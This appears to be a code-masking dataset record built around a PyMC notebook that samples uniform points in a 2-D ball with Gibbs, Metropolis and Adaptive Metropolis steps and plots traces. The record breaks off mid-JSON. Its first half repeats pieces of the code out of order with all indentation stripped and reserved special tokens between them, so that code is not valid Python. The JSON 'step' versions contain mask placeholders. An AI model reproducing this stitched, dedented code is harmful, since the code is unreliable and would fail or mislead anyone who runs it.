pl.yticks([0.0, 0.5, 1])
pl.axis([-12, 12, -0.1, 1.1])
pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')
pl.setp(ax2.get_xticklabels(), visible=False)
pl.setp(ax3.get_xticklabels(), visible=False)
pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X, s=3.0, t=pl.pi / 4.0):
    if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X[1] - pl.sin(t) * X[0]) ** 2 <= 1.0:
return 0
else:
return -pl.inf
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X):
if X[0] ** 2 + X[1] ** 2 <= 1.0:
return 0
else:
return -pl.inf
class UniformBall(mc.Gibbs):
def __init__(self, stochastic, others, verbose=None):
self.others = others
self.conjugate = True
mc.Gibbs.__init__(self, stochastic, verbose)
def propose(self):
x_other = [X_i.value for X_i in self.others]
max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))
self.stochastic.value = mc.runiform(-max_val, max_val)
<|reserved_special_token_0|>
def plot_trace(X, scale=1.0, angle=0.0):
fig = pl.figure(figsize=(12, 4.75))
ax1 = fig.add_subplot(1, 2, 1)
t = pl.arange(0, 2 * pl.pi, 0.01)
ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,
pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')
if isinstance(X, mc.Stochastic):
tr = [X.trace()[:, 0], X.trace()[:, 1]]
else:
tr = [X[0].trace(), X[1].trace()]
ax1.plot(tr[0], tr[1], 'ko-')
book_graphics.set_font()
pl.xlabel('$X_1$')
pl.ylabel('$X_2$', rotation=0)
pl.axis([-1.1, 1.1, -1.1, 1.1])
pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')
for i in range(2):
if i == 0:
ax2 = fig.add_subplot(2, 4, 3 + 4 * i)
ax2.plot(tr[i], 'k', drawstyle='steps-mid')
else:
ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)
ax2a.plot(tr[i], 'k', drawstyle='steps-mid')
pl.xlabel('Sample')
pl.xticks([25, 50, 75])
pl.yticks([-0.5, 0, 0.5])
pl.ylabel('$X_%d$' % (i + 1), rotation=0)
pl.axis([-5, 105, -1.5, 1.5])
pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')
if i == 0:
ax3 = fig.add_subplot(2, 4, 4 + 4 * i)
ax3.acorr(tr[i].reshape(100), color='k')
else:
ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)
ax3a.acorr(tr[i].reshape(100), color='k')
pl.xlabel('Autocorrelation')
pl.xticks([-5, 0, 5])
pl.yticks([0.0, 0.5, 1])
pl.axis([-12, 12, -0.1, 1.1])
pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')
pl.setp(ax2.get_xticklabels(), visible=False)
pl.setp(ax3.get_xticklabels(), visible=False)
pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X, s=3.0, t=pl.pi / 4.0):
    if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X[1] - pl.sin(t) * X[0]) ** 2 <= 1.0:
return 0
else:
return -pl.inf
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X, s=3.0, t=pl.pi / 4):
    if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X[1] - pl.sin(t) * X[0]) ** 2 <= 1.0:
return 0
else:
return -pl.inf
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
reload(book_graphics)
mc.np.random.seed(1234567)
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X):
if X[0] ** 2 + X[1] ** 2 <= 1.0:
return 0
else:
return -pl.inf
class UniformBall(mc.Gibbs):
def __init__(self, stochastic, others, verbose=None):
self.others = others
self.conjugate = True
mc.Gibbs.__init__(self, stochastic, verbose)
def propose(self):
x_other = [X_i.value for X_i in self.others]
max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))
self.stochastic.value = mc.runiform(-max_val, max_val)
<|reserved_special_token_0|>
for i in range(n):
m.use_step_method(UniformBall, X[i], [X[j] for j in range(n) if j != i])
m.sample(100, progress_bar=False)
def plot_trace(X, scale=1.0, angle=0.0):
fig = pl.figure(figsize=(12, 4.75))
ax1 = fig.add_subplot(1, 2, 1)
t = pl.arange(0, 2 * pl.pi, 0.01)
ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,
pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')
if isinstance(X, mc.Stochastic):
tr = [X.trace()[:, 0], X.trace()[:, 1]]
else:
tr = [X[0].trace(), X[1].trace()]
ax1.plot(tr[0], tr[1], 'ko-')
book_graphics.set_font()
pl.xlabel('$X_1$')
pl.ylabel('$X_2$', rotation=0)
pl.axis([-1.1, 1.1, -1.1, 1.1])
pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')
for i in range(2):
if i == 0:
ax2 = fig.add_subplot(2, 4, 3 + 4 * i)
ax2.plot(tr[i], 'k', drawstyle='steps-mid')
else:
ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)
ax2a.plot(tr[i], 'k', drawstyle='steps-mid')
pl.xlabel('Sample')
pl.xticks([25, 50, 75])
pl.yticks([-0.5, 0, 0.5])
pl.ylabel('$X_%d$' % (i + 1), rotation=0)
pl.axis([-5, 105, -1.5, 1.5])
pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')
if i == 0:
ax3 = fig.add_subplot(2, 4, 4 + 4 * i)
ax3.acorr(tr[i].reshape(100), color='k')
else:
ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)
ax3a.acorr(tr[i].reshape(100), color='k')
pl.xlabel('Autocorrelation')
pl.xticks([-5, 0, 5])
pl.yticks([0.0, 0.5, 1])
pl.axis([-12, 12, -0.1, 1.1])
pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')
pl.setp(ax2.get_xticklabels(), visible=False)
pl.setp(ax3.get_xticklabels(), visible=False)
pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)
plot_trace(X, 1, 0.0)
pl.savefig('book/graphics/gibbs-ball.pdf')
mc.np.random.seed(123456789)
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X, s=3.0, t=pl.pi / 4.0):
    if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X[1] - pl.sin(t) * X[0]) ** 2 <= 1.0:
return 0
else:
return -pl.inf
<|reserved_special_token_0|>
m.sample(100, progress_bar=False)
plot_trace(X, 3, pl.pi / 4)
pl.savefig('book/graphics/metropolis-ball.pdf')
mc.np.random.seed(1234567)
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X, s=3.0, t=pl.pi / 4):
    if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X[1] - pl.sin(t) * X[0]) ** 2 <= 1.0:
return 0
else:
return -pl.inf
<|reserved_special_token_0|>
m.use_step_method(mc.AdaptiveMetropolis, X)
m.sample(100, progress_bar=False)
plot_trace(X, 3, pl.pi / 4)
pl.savefig('book/graphics/am-ball-1.pdf')
m.sample(iter=20100, burn=20000, progress_bar=False)
plot_trace(X, 3, pl.pi / 4)
pl.savefig('book/graphics/am-ball-2.pdf')
pl.show()
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import pylab as pl
import pymc as mc
import book_graphics
reload(book_graphics)
# <markdowncell>
# Uniform points in an $n$-dimensional ball
# =========================================
#
# This notebook implements and compares samplers in PyMC
# to sample uniformly from an $n$-dimensional ball,
# i.e to sample from the set
# $$
# \mathbf{B}_n = \\{x \in \mathbf{R}^n: \|x\|\leq 1\\}
# $$
# <codecell>
mc.np.random.seed(1234567)
# simple model
n = 2
X = [mc.Uninformative('X_%d'%i, value=0) for i in range(n)]
@mc.potential
def in_ball(X=X):
if X[0]**2 + X[1]**2 <= 1.:
return 0
else:
return -pl.inf
# <codecell>
class UniformBall(mc.Gibbs):
def __init__(self, stochastic, others, verbose=None):
self.others = others
self.conjugate = True # pymc will include a Metropolis rejection step on top of the proposal if this is false
mc.Gibbs.__init__(self, stochastic, verbose)
def propose(self):
x_other = [X_i.value for X_i in self.others]
max_val = pl.sqrt(1. - pl.dot(x_other, x_other))
self.stochastic.value = mc.runiform(-max_val, max_val)
# <codecell>
m = mc.MCMC([X, in_ball])
for i in range(n):
m.use_step_method(UniformBall, X[i], [X[j] for j in range(n) if j != i])
# <codecell>
m.sample(100, progress_bar=False)
# <codecell>
def plot_trace(X, scale=1., angle=0.):
fig = pl.figure(figsize=(12,4.75))
ax1 = fig.add_subplot(1, 2, 1)
# plot boundary
t = pl.arange(0,2*pl.pi,.01)
ax1.plot(pl.cos(angle)*pl.cos(t) - pl.sin(angle)*pl.sin(t)/scale, pl.cos(angle)*pl.sin(t)/scale + pl.sin(angle)*pl.cos(t), 'k:')
# plot samples
if isinstance(X, mc.Stochastic):
tr = [X.trace()[:,0], X.trace()[:,1]]
else:
tr = [X[0].trace(), X[1].trace()]
ax1.plot(tr[0], tr[1], 'ko-')
# decorate plot
book_graphics.set_font()
pl.xlabel('$X_1$')
pl.ylabel('$X_2$', rotation=0)
pl.axis([-1.1,1.1,-1.1,1.1])
pl.text(-1,1,'(a)', fontsize=16, va='top', ha='left')
for i in range(2):
if i == 0:
ax2 = fig.add_subplot(2, 4, 3+4*i)
ax2.plot(tr[i], 'k', drawstyle='steps-mid')
else:
ax2a = fig.add_subplot(2, 4, 3+4*i, sharex=ax2)
ax2a.plot(tr[i], 'k', drawstyle='steps-mid')
pl.xlabel('Sample')
pl.xticks([25,50,75])
pl.yticks([-.5,0,.5])
pl.ylabel('$X_%d$'%(i+1), rotation=0)
pl.axis([-5,105,-1.5,1.5])
pl.text(-1,1.25,'(%s)'%'bc'[i], fontsize=16, va='top', ha='left')
if i == 0:
ax3 = fig.add_subplot(2, 4, 4+4*i)
ax3.acorr(tr[i].reshape(100), color='k')
else:
ax3a = fig.add_subplot(2, 4, 4+4*i, sharex=ax3)
ax3a.acorr(tr[i].reshape(100), color='k')
pl.xlabel('Autocorrelation')
pl.xticks([-5,0,5])
pl.yticks([0., .5, 1])
pl.axis([-12,12,-.1,1.1])
pl.text(-10,1,'(%s)'%'de'[i], fontsize=16, va='top', ha='left')
pl.setp(ax2.get_xticklabels(), visible=False)
pl.setp(ax3.get_xticklabels(), visible=False)
pl.subplots_adjust(wspace=.55, hspace=.1, bottom=.14,left=.13)
# <codecell>
plot_trace(X, 1, 0.)
pl.savefig('book/graphics/gibbs-ball.pdf')
# <markdowncell>
# Now with the Metropolis sampler
# ---------------------------------
# <codecell>
mc.np.random.seed(123456789)
# <codecell>
# simple model
n = 2
X = mc.Uninformative('X', value=[0,0])
@mc.potential
def in_ball(X=X, s=3., t=pl.pi/4.):
if (pl.cos(t)*X[0] + pl.sin(t)*X[1])**2 + s**2*(pl.cos(t)*X[1] -pl.sin(t)*X[0])**2 <= 1.:
return 0
else:
return -pl.inf
m = mc.MCMC([X, in_ball])
m.sample(100, progress_bar=False)
# <codecell>
plot_trace(X, 3, pl.pi/4)
pl.savefig('book/graphics/metropolis-ball.pdf')
# <markdowncell>
# Now with Adaptive Metropolis
# <codecell>
mc.np.random.seed(1234567)
# simple model
n = 2
X = mc.Uninformative('X', value=[0,0])
@mc.potential
def in_ball(X=X, s=3., t=pl.pi/4):
if (pl.cos(t)*X[0] + pl.sin(t)*X[1])**2 + s**2*(pl.cos(t)*X[1] -pl.sin(t)*X[0])**2 <= 1.:
return 0
else:
return -pl.inf
m = mc.MCMC([X, in_ball])
m.use_step_method(mc.AdaptiveMetropolis, X)
# <codecell>
m.sample(100, progress_bar=False)
plot_trace(X, 3, pl.pi/4)
pl.savefig('book/graphics/am-ball-1.pdf')
# <codecell>
m.sample(iter=20100, burn=20000, progress_bar=False)
plot_trace(X, 3, pl.pi/4)
pl.savefig('book/graphics/am-ball-2.pdf')
pl.show()
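The UniformBall step works because, conditional on the other coordinate, each X_i is uniform on the chord [-sqrt(1 - x_other**2), +sqrt(1 - x_other**2)]. The same Gibbs sweep in plain NumPy, free of the PyMC 2 dependency (a sketch under the assumption NumPy >= 1.17, not the notebook's own code):

import numpy as np

rng = np.random.default_rng(0)
x = np.zeros(2)
samples = []
for _ in range(1000):
    for i in range(2):
        other = x[1 - i]
        half_chord = np.sqrt(1.0 - other * other)  # conditional support of x[i]
        x[i] = rng.uniform(-half_chord, half_chord)
    samples.append(x.copy())
samples = np.array(samples)
# Every draw stays inside the unit disk by construction.
assert (samples[:, 0] ** 2 + samples[:, 1] ** 2 <= 1.0).all()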
|
flexible
|
{
"blob_id": "8283bdab023e22bba3d8a05f8bda0014ee19adee",
"index": 4286,
"step-1": "<mask token>\n\n\nclass UniformBall(mc.Gibbs):\n\n def __init__(self, stochastic, others, verbose=None):\n self.others = others\n self.conjugate = True\n mc.Gibbs.__init__(self, stochastic, verbose)\n\n def propose(self):\n x_other = [X_i.value for X_i in self.others]\n max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))\n self.stochastic.value = mc.runiform(-max_val, max_val)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]\ndef in_ball(X=X):\n if X[0] ** 2 + X[1] ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\nclass UniformBall(mc.Gibbs):\n\n def __init__(self, stochastic, others, verbose=None):\n self.others = others\n self.conjugate = True\n mc.Gibbs.__init__(self, stochastic, verbose)\n\n def propose(self):\n x_other = [X_i.value for X_i in self.others]\n max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))\n self.stochastic.value = mc.runiform(-max_val, max_val)\n\n\n<mask token>\n\n\ndef plot_trace(X, scale=1.0, angle=0.0):\n fig = pl.figure(figsize=(12, 4.75))\n ax1 = fig.add_subplot(1, 2, 1)\n t = pl.arange(0, 2 * pl.pi, 0.01)\n ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,\n pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')\n if isinstance(X, mc.Stochastic):\n tr = [X.trace()[:, 0], X.trace()[:, 1]]\n else:\n tr = [X[0].trace(), X[1].trace()]\n ax1.plot(tr[0], tr[1], 'ko-')\n book_graphics.set_font()\n pl.xlabel('$X_1$')\n pl.ylabel('$X_2$', rotation=0)\n pl.axis([-1.1, 1.1, -1.1, 1.1])\n pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')\n for i in range(2):\n if i == 0:\n ax2 = fig.add_subplot(2, 4, 3 + 4 * i)\n ax2.plot(tr[i], 'k', drawstyle='steps-mid')\n else:\n ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)\n ax2a.plot(tr[i], 'k', drawstyle='steps-mid')\n pl.xlabel('Sample')\n pl.xticks([25, 50, 75])\n pl.yticks([-0.5, 0, 0.5])\n pl.ylabel('$X_%d$' % (i + 1), rotation=0)\n pl.axis([-5, 105, -1.5, 1.5])\n pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')\n if i == 0:\n ax3 = fig.add_subplot(2, 4, 4 + 4 * i)\n ax3.acorr(tr[i].reshape(100), color='k')\n else:\n ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)\n ax3a.acorr(tr[i].reshape(100), color='k')\n pl.xlabel('Autocorrelation')\n pl.xticks([-5, 0, 5])\n pl.yticks([0.0, 0.5, 1])\n pl.axis([-12, 12, -0.1, 1.1])\n pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')\n pl.setp(ax2.get_xticklabels(), visible=False)\n pl.setp(ax3.get_xticklabels(), visible=False)\n pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)\n\n\n<mask token>\n\n\[email protected]\ndef in_ball(X=X, s=3.0, t=pl.pi / 4.0):\n if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X\n [1] - pl.sin(t) * X[0]) ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]\ndef in_ball(X=X):\n if X[0] ** 2 + X[1] ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\nclass UniformBall(mc.Gibbs):\n\n def __init__(self, stochastic, others, verbose=None):\n self.others = others\n self.conjugate = True\n mc.Gibbs.__init__(self, stochastic, verbose)\n\n def propose(self):\n x_other = [X_i.value for X_i in self.others]\n max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))\n self.stochastic.value = mc.runiform(-max_val, max_val)\n\n\n<mask token>\n\n\ndef plot_trace(X, scale=1.0, angle=0.0):\n fig = pl.figure(figsize=(12, 4.75))\n ax1 = fig.add_subplot(1, 2, 1)\n t = pl.arange(0, 2 * pl.pi, 0.01)\n ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,\n pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')\n if isinstance(X, mc.Stochastic):\n tr = [X.trace()[:, 0], X.trace()[:, 1]]\n else:\n tr = [X[0].trace(), X[1].trace()]\n ax1.plot(tr[0], tr[1], 'ko-')\n book_graphics.set_font()\n pl.xlabel('$X_1$')\n pl.ylabel('$X_2$', rotation=0)\n pl.axis([-1.1, 1.1, -1.1, 1.1])\n pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')\n for i in range(2):\n if i == 0:\n ax2 = fig.add_subplot(2, 4, 3 + 4 * i)\n ax2.plot(tr[i], 'k', drawstyle='steps-mid')\n else:\n ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)\n ax2a.plot(tr[i], 'k', drawstyle='steps-mid')\n pl.xlabel('Sample')\n pl.xticks([25, 50, 75])\n pl.yticks([-0.5, 0, 0.5])\n pl.ylabel('$X_%d$' % (i + 1), rotation=0)\n pl.axis([-5, 105, -1.5, 1.5])\n pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')\n if i == 0:\n ax3 = fig.add_subplot(2, 4, 4 + 4 * i)\n ax3.acorr(tr[i].reshape(100), color='k')\n else:\n ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)\n ax3a.acorr(tr[i].reshape(100), color='k')\n pl.xlabel('Autocorrelation')\n pl.xticks([-5, 0, 5])\n pl.yticks([0.0, 0.5, 1])\n pl.axis([-12, 12, -0.1, 1.1])\n pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')\n pl.setp(ax2.get_xticklabels(), visible=False)\n pl.setp(ax3.get_xticklabels(), visible=False)\n pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)\n\n\n<mask token>\n\n\[email protected]\ndef in_ball(X=X, s=3.0, t=pl.pi / 4.0):\n if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X\n [1] - pl.sin(t) * X[0]) ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\n<mask token>\n\n\[email protected]\ndef in_ball(X=X, s=3.0, t=pl.pi / 4):\n if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X\n [1] - pl.sin(t) * X[0]) ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\n<mask token>\n",
"step-4": "<mask token>\nreload(book_graphics)\nmc.np.random.seed(1234567)\n<mask token>\n\n\[email protected]\ndef in_ball(X=X):\n if X[0] ** 2 + X[1] ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\nclass UniformBall(mc.Gibbs):\n\n def __init__(self, stochastic, others, verbose=None):\n self.others = others\n self.conjugate = True\n mc.Gibbs.__init__(self, stochastic, verbose)\n\n def propose(self):\n x_other = [X_i.value for X_i in self.others]\n max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))\n self.stochastic.value = mc.runiform(-max_val, max_val)\n\n\n<mask token>\nfor i in range(n):\n m.use_step_method(UniformBall, X[i], [X[j] for j in range(n) if j != i])\nm.sample(100, progress_bar=False)\n\n\ndef plot_trace(X, scale=1.0, angle=0.0):\n fig = pl.figure(figsize=(12, 4.75))\n ax1 = fig.add_subplot(1, 2, 1)\n t = pl.arange(0, 2 * pl.pi, 0.01)\n ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,\n pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')\n if isinstance(X, mc.Stochastic):\n tr = [X.trace()[:, 0], X.trace()[:, 1]]\n else:\n tr = [X[0].trace(), X[1].trace()]\n ax1.plot(tr[0], tr[1], 'ko-')\n book_graphics.set_font()\n pl.xlabel('$X_1$')\n pl.ylabel('$X_2$', rotation=0)\n pl.axis([-1.1, 1.1, -1.1, 1.1])\n pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')\n for i in range(2):\n if i == 0:\n ax2 = fig.add_subplot(2, 4, 3 + 4 * i)\n ax2.plot(tr[i], 'k', drawstyle='steps-mid')\n else:\n ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)\n ax2a.plot(tr[i], 'k', drawstyle='steps-mid')\n pl.xlabel('Sample')\n pl.xticks([25, 50, 75])\n pl.yticks([-0.5, 0, 0.5])\n pl.ylabel('$X_%d$' % (i + 1), rotation=0)\n pl.axis([-5, 105, -1.5, 1.5])\n pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')\n if i == 0:\n ax3 = fig.add_subplot(2, 4, 4 + 4 * i)\n ax3.acorr(tr[i].reshape(100), color='k')\n else:\n ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)\n ax3a.acorr(tr[i].reshape(100), color='k')\n pl.xlabel('Autocorrelation')\n pl.xticks([-5, 0, 5])\n pl.yticks([0.0, 0.5, 1])\n pl.axis([-12, 12, -0.1, 1.1])\n pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')\n pl.setp(ax2.get_xticklabels(), visible=False)\n pl.setp(ax3.get_xticklabels(), visible=False)\n pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)\n\n\nplot_trace(X, 1, 0.0)\npl.savefig('book/graphics/gibbs-ball.pdf')\nmc.np.random.seed(123456789)\n<mask token>\n\n\[email protected]\ndef in_ball(X=X, s=3.0, t=pl.pi / 4.0):\n if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X\n [1] - pl.sin(t) * X[0]) ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\n<mask token>\nm.sample(100, progress_bar=False)\nplot_trace(X, 3, pl.pi / 4)\npl.savefig('book/graphics/metropolis-ball.pdf')\nmc.np.random.seed(1234567)\n<mask token>\n\n\[email protected]\ndef in_ball(X=X, s=3.0, t=pl.pi / 4):\n if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X\n [1] - pl.sin(t) * X[0]) ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\n<mask token>\nm.use_step_method(mc.AdaptiveMetropolis, X)\nm.sample(100, progress_bar=False)\nplot_trace(X, 3, pl.pi / 4)\npl.savefig('book/graphics/am-ball-1.pdf')\nm.sample(iter=20100, burn=20000, progress_bar=False)\nplot_trace(X, 3, pl.pi / 4)\npl.savefig('book/graphics/am-ball-2.pdf')\npl.show()\n",
"step-5": "# -*- coding: utf-8 -*-\r\n# <nbformat>3.0</nbformat>\r\n\r\n# <codecell>\r\n\r\nimport pylab as pl\r\nimport pymc as mc\r\nimport book_graphics\r\nreload(book_graphics)\r\n\r\n# <markdowncell>\r\n\r\n# Uniform points in an $n$-dimensional ball\r\n# =========================================\r\n# \r\n# This notebook implements and compares samplers in PyMC\r\n# to sample uniformly from an $n$-dimensional ball,\r\n# i.e to sample from the set\r\n# $$\r\n# \\mathbf{B}_n = \\\\{x \\in \\mathbf{R}^n: \\|x\\|\\leq 1\\\\}\r\n# $$\r\n\r\n# <codecell>\r\n\r\nmc.np.random.seed(1234567)\r\n\r\n# simple model\r\nn = 2\r\nX = [mc.Uninformative('X_%d'%i, value=0) for i in range(n)]\r\[email protected]\r\ndef in_ball(X=X):\r\n if X[0]**2 + X[1]**2 <= 1.:\r\n return 0\r\n else:\r\n return -pl.inf\r\n\r\n# <codecell>\r\n\r\nclass UniformBall(mc.Gibbs):\r\n def __init__(self, stochastic, others, verbose=None):\r\n self.others = others\r\n self.conjugate = True # pymc will include a Metropolis rejection step on top of the proposal if this is false\r\n mc.Gibbs.__init__(self, stochastic, verbose)\r\n \r\n def propose(self):\r\n x_other = [X_i.value for X_i in self.others]\r\n max_val = pl.sqrt(1. - pl.dot(x_other, x_other))\r\n self.stochastic.value = mc.runiform(-max_val, max_val)\r\n\r\n# <codecell>\r\n\r\nm = mc.MCMC([X, in_ball])\r\nfor i in range(n):\r\n m.use_step_method(UniformBall, X[i], [X[j] for j in range(n) if j != i])\r\n\r\n# <codecell>\r\n\r\nm.sample(100, progress_bar=False)\r\n\r\n# <codecell>\r\n\r\ndef plot_trace(X, scale=1., angle=0.):\r\n fig = pl.figure(figsize=(12,4.75))\r\n \r\n ax1 = fig.add_subplot(1, 2, 1)\r\n # plot boundary\r\n t = pl.arange(0,2*pl.pi,.01)\r\n ax1.plot(pl.cos(angle)*pl.cos(t) - pl.sin(angle)*pl.sin(t)/scale, pl.cos(angle)*pl.sin(t)/scale + pl.sin(angle)*pl.cos(t), 'k:')\r\n \r\n # plot samples\r\n if isinstance(X, mc.Stochastic):\r\n tr = [X.trace()[:,0], X.trace()[:,1]]\r\n else:\r\n tr = [X[0].trace(), X[1].trace()]\r\n\r\n ax1.plot(tr[0], tr[1], 'ko-')\r\n \r\n # decorate plot\r\n book_graphics.set_font()\r\n pl.xlabel('$X_1$')\r\n pl.ylabel('$X_2$', rotation=0)\r\n pl.axis([-1.1,1.1,-1.1,1.1])\r\n pl.text(-1,1,'(a)', fontsize=16, va='top', ha='left')\r\n\r\n \r\n for i in range(2):\r\n if i == 0:\r\n ax2 = fig.add_subplot(2, 4, 3+4*i)\r\n ax2.plot(tr[i], 'k', drawstyle='steps-mid')\r\n else:\r\n ax2a = fig.add_subplot(2, 4, 3+4*i, sharex=ax2)\r\n ax2a.plot(tr[i], 'k', drawstyle='steps-mid')\r\n pl.xlabel('Sample')\r\n \r\n pl.xticks([25,50,75])\r\n pl.yticks([-.5,0,.5])\r\n pl.ylabel('$X_%d$'%(i+1), rotation=0)\r\n pl.axis([-5,105,-1.5,1.5])\r\n pl.text(-1,1.25,'(%s)'%'bc'[i], fontsize=16, va='top', ha='left')\r\n \r\n if i == 0:\r\n ax3 = fig.add_subplot(2, 4, 4+4*i)\r\n ax3.acorr(tr[i].reshape(100), color='k')\r\n else:\r\n ax3a = fig.add_subplot(2, 4, 4+4*i, sharex=ax3)\r\n ax3a.acorr(tr[i].reshape(100), color='k')\r\n pl.xlabel('Autocorrelation')\r\n \r\n pl.xticks([-5,0,5])\r\n pl.yticks([0., .5, 1])\r\n pl.axis([-12,12,-.1,1.1])\r\n pl.text(-10,1,'(%s)'%'de'[i], fontsize=16, va='top', ha='left')\r\n \r\n pl.setp(ax2.get_xticklabels(), visible=False)\r\n pl.setp(ax3.get_xticklabels(), visible=False)\r\n pl.subplots_adjust(wspace=.55, hspace=.1, bottom=.14,left=.13)\r\n\r\n# <codecell>\r\n\r\nplot_trace(X, 1, 0.)\r\npl.savefig('book/graphics/gibbs-ball.pdf')\r\n\r\n# <markdowncell>\r\n\r\n# Now with the Metropolis sampler\r\n# ---------------------------------\r\n\r\n# <codecell>\r\n\r\nmc.np.random.seed(123456789)\r\n\r\n# <codecell>\r\n\r\n# 
simple model\r\n\r\nn = 2\r\nX = mc.Uninformative('X', value=[0,0])\r\[email protected]\r\ndef in_ball(X=X, s=3., t=pl.pi/4.):\r\n if (pl.cos(t)*X[0] + pl.sin(t)*X[1])**2 + s**2*(pl.cos(t)*X[1] -pl.sin(t)*X[0])**2 <= 1.:\r\n return 0\r\n else:\r\n return -pl.inf\r\n \r\nm = mc.MCMC([X, in_ball])\r\n\r\nm.sample(100, progress_bar=False)\r\n\r\n# <codecell>\r\n\r\nplot_trace(X, 3, pl.pi/4)\r\npl.savefig('book/graphics/metropolis-ball.pdf')\r\n\r\n# <markdowncell>\r\n\r\n# Now with Adaptive Metropolis\r\n\r\n# <codecell>\r\n\r\nmc.np.random.seed(1234567)\r\n\r\n# simple model\r\nn = 2\r\nX = mc.Uninformative('X', value=[0,0])\r\[email protected]\r\ndef in_ball(X=X, s=3., t=pl.pi/4):\r\n if (pl.cos(t)*X[0] + pl.sin(t)*X[1])**2 + s**2*(pl.cos(t)*X[1] -pl.sin(t)*X[0])**2 <= 1.:\r\n return 0\r\n else:\r\n return -pl.inf\r\n \r\nm = mc.MCMC([X, 